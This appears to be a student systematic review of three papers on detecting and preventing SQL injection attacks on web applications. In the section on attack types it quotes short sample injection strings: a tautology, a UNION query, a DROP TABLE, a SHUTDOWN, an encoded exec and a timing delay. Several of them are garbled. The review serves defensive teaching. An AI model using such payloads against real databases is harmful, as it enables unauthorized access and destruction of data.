Contents

Contents ...................................................................................................................................... i
List of Tables .............................................................................................................................ii
List of Figures .......................................................................................................................... iii
Abbreviations ............................................................................................................................ iv
Abstract ...................................................................................................................................... v
Keywords ................................................................................................................................... v
1. Introduction ........................................................................................................................ 1
2. SQL Injection Overview ..................................................................................................... 1
2.1. SQLI Attack Process ................................................................................................... 1
3. Research Methodology ....................................................................................................... 2
3.1. Research Questions ..................................................................................................... 2
3.1.1. Research Question 1 ............................................................................................ 3
3.1.2. Research Question 2 ............................................................................................ 3
3.1.3. Research Question 3 ............................................................................................ 3
3.2. Searching Process ........................................................................................................ 3
3.2.1. Searching Papers .................................................................................................. 3
3.2.2. Selection Execution ............................................................................................. 4
3.2.3. Quality Assessment and Extracting Information ................................................. 5
4. Result and Critique ............................................................................................................. 5
4.1. Publication Growth in SQL Injection Detection Field (RQ1) .................................... 5
4.2 Types of SQL Injection Attacks (RQ2)............................................................................ 5
4.3 SQL Injection Detection and Prevention Techniques (RQ3) ...................................... 7
4.3.1 SQL Injection Detection Techniques ...................................................................... 7
4.3.2 SQL Injection Prevention Techniques ..................................................................... 7
5. Recommendation ................................................................................................................ 8
6. Conclusion .......................................................................................................................... 9
7. References .......................................................................................................................... 9

i
 List of Tables

Table 1- Searching keywords..................................................................................................... 4

Table 2: Quality assessment criteria .......................................................................................... 5

ii
 List of Figures

Figure 1: SQLI attack process.................................................................................................... 2

Figure 2: The filtering process and the number of resultant papers after each step .................. 3

iii
 Abbreviations
P1 – SQLIA Detection and Prevention Techniques by Mazoon Al Rubaiei, Thuraiya Al Yarubi,
Maiya Al Saadi and Basant Kumar
P2 – A Detection and Prevention Technique on SQL Injection Attacks by Zar Chi Su Su Hlaing
and Myo Khaing
P3 – Identification and Mitigation Tool for SQL Injection Attack by W.H. Rankothge, Mohan
Randeniya, Viraj, and Viraj Samaranayaka

iv
 Abstract

Web developments are developing rapidly and most of the individuals do their transactions on
the web such as searching for information, banking, purchasing, managing, checking and
managing transactions etc. Web applications have become suitable for many individuals’ daily
activities. Risks associated with web applications have expanded to a great extent. Now a days,
the number of threats increases as the exposure decreases. Structured Query Language Injection
Attack (SQLIA) is one of the most serious threats to web applications. Lack of input validation
vulnerabilities that could lead to SQL injection attacks on the web. SQLIA is a malicious
function that takes an incorrect SQL statement to abuse database-driven applications. This
vulnerability allows an attacker to respect input generated to disclose the application's
interactions with back-end databases. Therefore, the attacker can access the database without
legal authorization by entering, modifying or deleting critical information. Many techniques
have been developed to detect and mitigate these types of attacks. This paper presents a
systematic review of a pool of 3 papers on SQL injection detection methods for web
applications. The pool was selected using a search and filtering method developed for literature
based on scholarly databases (IEEE, Science Direct and Research Gate) with the aim of
providing a specific response to several research questions in the area of SQL injection
detection and prevention. This provides the basis for designing and using effective SQL
injection detection methods.

Keywords

SQL Injection Attack, Database Injection, Detection Techniques, Prevention, Mitigation

v
 1. Introduction

Large amounts of sensitive data of companies and organizations are stored in special databases
inside the organization’s servers or somewhere abroad. Protecting these data from unauthorized
access is extremely important to organizations in various sectors since any leak in these data
will have a huge impact on the privacy of the users as well as the reputation and financial
situation of the institution. Consequently, data comprise one of the most important assets that
must be preserved and protected; thus, databases have become important treasuries and pillars
of modern organizations.
Structured Query Language (SQL) is the standard language used to access and manipulate these
databases, as it allows the database administrator to perform multiple operations on data such
as storing, retrieving, creating, updating, or deleting, etc. SQL databases are mostly used in
web applications to store data for sites, users and are handled through queries within specific
commands. Visitors’ activities are translated into SQL commands to modify and update their
data so that they don’t interact directly with these databases. Besides, attackers have exploited
this advantage and targeted databases to get access to data. One of the most common attacks
on databases is SQL injection [3]. The first appearance of SQL injection vulnerabilities dates
to 1998 when Jeff Forristal was writing about how to infiltrate Windows NT server. This was
the beginning of the discovery of this kind of threat.
This paper systematically reviews three research papers that proposed techniques, algorithms,
and frameworks for detect and mitigate the different types of SQL injection attacks on web
applications, by selecting a specific issue, defining the scope of the review, selecting scholar
databases (IEEE, Science Direct, and Research Gate) to search for the related research papers.
Moreover, it classified the proposed approaches, and analyze their performance.

2. SQL Injection Overview

SQL injection is a technique that is executed by attackers to target the databases, exploiting
vulnerabilities in web applications. This vulnerability results from weaknesses in filtering
variables [4], which allow the attacker to access, retrieve, modify, or delete user data using
illegitimate methods.

2.1. SQLI Attack Process

Web based application is working based on three-tier design, which are a presentation tier

1
through HTTP web interface, application tire and data tier. If there is lack of input validation
in application that causes a SQLIA attack which is a code injection technique that exploits
database tier where the attacker adds Structured Query Language (SQL) command into
presentation tier to gain access to resources, make changes to data and cause a distraction to
the entire database [5].
SQLI attack process involves the following steps: -
a. The attacker adds SQL statements through a web application’s input fields or hidden
b. Web application receives an HTTP request from a web client (attacker) as input and gen-
erates a SQL, then the attacker can obtain access to web application login by a malicious
user exploiting SQL Injection vulnerability as admin without knowing the right password
using the Boolean tautology added (OR 1=1) into SQL command return always true
c. Submits the SQL statement as output for the back end database server, finally the attacker
gains access successfully because of lack in the sanitization of inputs.

Figure 1: SQLI attack process

3. Research Methodology

This systematic review includes papers on detection methods and techniques of SQL injection
attack published during the period 2019 to 2021, using the following searching engines: IEEE,
Science Direct, and Research Gate. The filtering process and the number of resultant papers
after each level are shown in Figure 1.

3.1. Research Questions

Research papers included in this systematic review were selected to answer the following
research questions.

2
Figure 2: The filtering process and the number of resultant papers after each step

3.1.1. Research Question 1

 How has publication grown in the SQL injection detection field?

The purpose of this question is to examine the views of the reviewed research papers on the
significance of the SQL injection attacks, regarding how these attacks are being developed and
the level of severity they have reached during recent years.

3.1.2. Research Question 2

 What types of SQL injection attacks have been discussed?

This question targets to specify the types of SQL injection attacks that can be solved by each
proposed method, algorithm, or framework.

3.1.3. Research Question 3

 What are the proposed methods to detect and mitigate these attacks?
This research question aims to explore the most common and efficient methods that have been
proposed to face each type of attack.

3.2. Searching Process

3.2.1. Searching Papers

The search for the related research papers was performed on the IEEE Explore, Science Direct,
and Research Gate database libraries, covering the publication period from 2019 to 2021, to
include the most up-to -date and relevant publications.

3
The keywords used in the searching process are listed in below.

Table 1- Searching keywords

Keywords Alternative Keyword combinations
keywords
SQL Database  SQL AND injection AND (detection techniques OR
Injection prevention)
Detection  SQL AND injection AND (detection techniques OR
Techniques Prevention, mitigation)
Mitigation  Database AND Injection AND (detection techniques
OR prevention)
 Database AND injection AND (detection techniques
OR mitigation)

3.2.2. Selection Execution

A large number of research papers have been collected from each search engine through the
used search method. All the extracted papers were filtered during multiple levels: creating a
CSV file to remove duplicate papers, selection based on the title, selection based on abstract,
and selection based on quality assessment questions and full text analysis. These levels are
explained as follows:
Level 1. Removing Duplications: All papers resulting from the searching on the three engines
totaled 813 papers, using the strings mentioned in Table 1, including 73 papers from IEEE, 640
papers from Science Direct, and 100 papers from Research Gate. To remove any duplications
among these papers, a CSV file was used to filter the duplications, removing 6 duplicate papers.
Level 2. Title Selection: In this level, papers from level 1 were filtered based on evaluating
their titles and determining how relevant the titles to the research questions are. The first author
nominated papers extracted from the IEEE engine and the second author nominated those
extracted from Science Direct and Research Gate. This resulted in 172 papers.
Level 3. Abstract & Full-Text Analysis Selection: The 172 papers were then filtered again by
reading their abstracts and how relevant they are to the research questions. Those that didn’t
propose any specific mitigation techniques in their abstracts were removed. This resulted in 13
research papers.
Level 4. Quality Assessment Questions: Finally, each of the 13 papers was assessed based on
the quality assessment questions and 7 papers were selected. Finally, we have reviewed 3
papers out of the seven selected papers.

4
 3.2.3. Quality Assessment and Extracting Information

Quality assessment targets to evaluate the papers to determine their level of quality. Each paper
must pass through 7 assessment questions with one point for each question. Based on the
cumulative score, the quality level of the paper is determined. Table 2 shows the quality
assessment criteria developed for this purpose.

Table 2: Quality assessment criteria

# Question
Q1  Does the title of the paper clarify the idea of the research?
Q2  Does the abstract explain the objectives of the research?
Q3  Does the writer follow the systematic/standard arrangement of the research pa-
per?
Q4  Does the paper use a mechanism, technique, or methodology?
Q5  Does the paper specify the type of the SQL injection attack?
Q6  Does the proposed approach succeed in detecting/mitigating SQL injection at-
tacks?
Q7  Are the results/evaluations shown conclusively in the paper?

4. Result and Critique

4.1. Publication Growth in SQL Injection Detection Field (RQ1)

The answer to this question is related to exploring the motivation behind each approach and
how security concerns have become important in developing secure web applications through
recent years. This is indicated by the number of publications in the field of SQL injection and
web application attacks detection during the period 2019–2021. We found that the number of
articles that discuss the topic of SQL injection attacks increased during the first three years
from 2019 to 2021.

4.2 Types of SQL Injection Attacks (RQ2)

All of this 3 papers try to mention and define all possible types of SQLIA. With specific
examples related to each attack type. Now let’s try to see each types of attacks individually. In
paper 1 there are 8 types of SQLIA those are Tautologies, Illegal/Logically incorrect Queries,
Union Query injected, Piggy-backed, Stored Procedure, Alternate Encodings, Timing attack,
Blind Injection.

5
To make brief all types of attack in paper 1, let’s define all of them in short.
 Tautologies: - get access to the application without supplying a valid user name. E.g.
SELECT Emp_NO from Employee where username=”or “1‟=‟1‟ and password=””;
 Illegal/ Logically Incorrect Queries: - reveal relevant data of database being used from
the return error messages or logical error. E.g. SELECT Emp_id from Employee where user
name=”xyz” and password=!@#$%^&*
 Union Query: - Disclosure of sensitive information using union queries, which contain set
operators. E.g. SELECT Salary_info from Employee where user name=‟abc“ and
password=”” ; UNION SELECT Salary _info from Employee where Emp_ id= “1234” ;
 Piggy-backed: - Aim to deletes or removes information with a harming intention. E.g.
SELECT Salary_info from Employee where user name=‟abc”and password=””; DROP
table user:
 Stored Procedure: - Aim to gain access to the host operating system by performing a
command execution. E.g. SELECT Salary_info from Employee where user name=‟abc “
and password=”” ;SHUTDOWN
 Alternate Encodings: - Aim to hide the aggressor’s pattern via alternate encodings, such
as hexadecimal, ASCII. E.g. SELECT Salary_info from Employee where user name=‟abc
“ and password=”” ; exec(char(0x738757464f776e))
 Timing Attacks: - Aim to delays the database’s responses using wait for keyword. E.g.
Declare @varchar(8000) select @s= db_name if (asci(substring (@s,11)) & (power
(2,0)))> 0 waitfor delay ‘0:0:5’
 Blind Injection: - To get the advantage of forgetting and none hiding error message by
asking a series of logical questions through SQL statements. E.g. Select pass from useTable
where username=’user’ and 1=0 -- and pass and pin=0 select info from userTable where
username=’user’ and 1—and pass= and pass=0.
Where as in the second paper the author tries to classify the SQLIA types in to six. Some of
attacks are shared with the paper one. The list of SQLIA types in paper two is Tautologies,
Malformed Queries, Union Query, Piggy-backed Queries, Inference, and Stored
Procedure. In this paper the author tries to classify the attack in this group. The four type of
attack is directly the same name and definition with paper one. Whereas Malformed Queries is
the same with the attack type in the paper 1 of “Illegal/ Logically Incorrect Queries” and the
other “Inference” holds those “Timing attack” and “Bind Injection” both in one major
category of Inference attacks those are stated in the paper 1. So that those two papers are agree
with those attack type in common. With definition or implementations. In the third paper

6
instead of listing all types of SQLIA the author tries to show the lack of the other paper to
detect the attack of Random integer number which is append with normal SQL Keywords
which is A proxy, which acts as a parser between the web server, intercepts the randomized
query, decodes to proper SQL queries to be sending to the database. And the focus of this 3rd
paper is on Identification and mitigation of the attacks. Those 3 papers try to I identify and
classify all possible types of SQLIA.

4.3 SQL Injection Detection and Prevention Techniques (RQ3)

4.3.1 SQL Injection Detection Techniques

SQL Injection Attack Detection Techniques are clearly defined in all three papers. All
detections techniques on paper 1 are classified in 3 major categories. But in our review based
on concept of the paper related to attack detection Technique we want to category all methods
in the paper 1 category. Even though the other paper didn’t put those categories the Idea of
detection techniques can be grouped in those broad category for example on the paper 3 to
detect weather the developed web application is exposed to SQLIA or not use Webmail tool to
inject all input fields with SQLIA payload and then if the injection is successful the fields are
venerable and will undergo prevention technique if not the application is secure. But all those
actions are takes place in development phase. In this scene the detection technique in paper 3
will categorized in static technique.

4.3.2 SQL Injection Prevention Techniques

On the above section those 3 papers try to show the list of possible types of attacks. On this
section we will try to show all possible prevention techniques of SQLIA.
Now lets us show all possible presentation techniques those are try to cover in paper 1.
 Input and URL Validation: - this technique is try to avoid the attack related to Input filed
and URL by using input format, input length, input range and the accurate characters to be
entered. If the user enters out of those the user will be rejected.
 Data Sanitization: - it sanitizes the data from any characters that are not needed and it
mainly ensures that the username and password do not include apostrophes and it contains
only valid characters where the preferable way is to use the normal expressions to remove
the unwanted characters where the normal characters are most potent for string parsing and
pattern matching on hidden fields, inactive fields and cookies.
 Prepared Statement for Query Execution: - a prepared statement is very beneficial against

7
 SQL injection attack because the parameter value, which terminated by the different
protocol is not required to escape.
 Query and Session Tokenization: - This approach refers to the conversion of the input query
to different tokens. It uses arrays to store the tokens where the original and the injected
queries will be stored. The array length is very important so that, if the array length does
not match, it means that the query is injected. If not, the query is safe and normal. All the
strings that are before the single quotes, double dashes or space frame as a token. In this
approach, the main query and the query which is injected are treated differently.
In Paper 2 there are the same prevention techniques with paper one and three but there are also
additional techniques in this paper those are; _
 Stored Procedures: - stored procedure is composed and stored in the database server, and
then called from the web application. If user access to the database is just at any point
allowed by means of stored procedure strategies, permitted access for user to legitimately
get to data doesn’t not need to be explicitly granted on any database table. Along these
lines, the database is still safe.
 Encrypting Data: - the encrypted data value will prevent attacker to read sensitive data and
any further changes to databases would have no effect.
 Limiting Privileges: - to identify the authenticated user there should be used an account
with limited privileges to limit the extent of harms in the occurrence of SQL Injection. and
the techniques of “Prepared Statement” and “Validating User Input “are defined on the
paper one in the same manner.
But in the 3rd paper the prevention techniques recommend those two techniques user input
validation and parameterized queries to prevent SQLIA. On the help of the proposed tool which
is WebMIV tools

5. Recommendation
Our team try to evaluate all those three papers based on their own techniques for detection,
prevention and mitigation techniques. And all try to show the new techniques to secure
applications. But except paper 3 the other 2 papers not proposed a tool that has common
standard and reusable tool for future use. We think that not every one of the developer is aware
of SQLIA to identify and protect them self from the attack using those paper. Due to that if
there is a tool to test and verify weather his/her system is secure or not that was very important.
And our final recommendation is instead of listing all exposing and find all possible prevention

8
technique for every attack, it is better to focus on common pattern that will reject all logical
positivity and accept all predefined input format. Because now in this era may be there will be
many types of SQLIA will create overnight. So it is not feasible to overcome all treats.

6. Conclusion
Our team have analyzed a total of 3 research papers and reviewed a comparison of different
techniques for detecting and preventing SQLIAs. Firstly we identified different type of SQLI
attacks from the papers. After that based on the type of attacks we evaluate effective techniques
for detecting and preventing such attacks. We have got different mechanisms from papers
through which SQLIAs can be introduced into an application and identified which techniques
were able to handle which mechanisms, especially Java Static Tainting and Store procedures
are the most powerful approaches to handle SQLI attack. Based on our evaluation we can found
several general trends from three papers especially on “Mazoon Al Rubaiei et a”.
We found a general distinction in prevention abilities based on the difference between
prevention-focused and general detection and prevention techniques. Future evaluation work
should focus on evaluating the techniques’ precision and effectiveness in practice.

7. References

1. Győrödi, C., Győrödi, R., Pecherle, G., & Olah, A. (2015). A comparative study: MongoDB
vs. MySQL. In 2015 13th International Conference on Engineering of Modern Electric
Systems (EMES) (pp. 1–6). IEEE, Oradea, Romania.
2. Matallah, H., Belalem, G., & Bouamrane, K. (2021). Comparative study between the
MySQL relational database and the MongoDB NoSQL database. International Journal of
Software Science and Computational Intelligence (IJSSCI), 13(3), 38–63.
3. Lee, I., Jeong, S., Yeo, S., & Moon, J. (2012). A novel method for SQL injection attack
detection based on removing SQL query attribute values. Mathematical and Computer
Modelling, 55(1–2), 58–68
4. Sadeghian, A., Zamani, M., & Ibrahim, S. (2013a). SQL injection is still alive: A study on
SQL injection signature evasion techniques. In 2013 International Conference on
Informatics and Creative Multimedia (pp. 265–268). IEEE, Kuala Lumpur, Malaysia.
5. J. Wang, R. C. Phan, J. N. Whitley, and D. J. Parish, “Augmented Attack Tree Modeling
of SQL Injection Attacks,” 2010 2nd IEEE Int. Conf. Inf. Manag. Eng., vol. 4, pp. 182–
186, 2010.

9
6. M. Kumar, L. Indu, “Detection and Prevention of SQL Injection Attack”, International
Journal of Computer Science and Information Technologies, vol. 5, no. 1, pp. 374-377,
2014.
7. A. Gupta, Dr. S. K. Yadav, “An Approach for Preventing SQL Injection Attack on Web
Application”, International Journal of Computer Science and Mobile Computing, vol.5,
issue. 6, pp. 01- 10, June 2016.
8. William G.J. Halfond, A. Orso, “Detection and Prevention of SQL Injection Attack”,
Georgia Institute of Technology
9. Sonakshi, R, Kumar, G. Gopal, “Case Study of SQL Injection Attacks”, International
Journal of Engineering Science & Research Technology, pp. 176-189, July 2016.
10. Z. S. Alwan, M. F. Younis, “Detection and Prevention of SQL Injection Attack: A Survey”,
International Journal of Computer Science and Mobile Computing, vol. 6, issue. 8, pp. 5-
17, August 2017.

10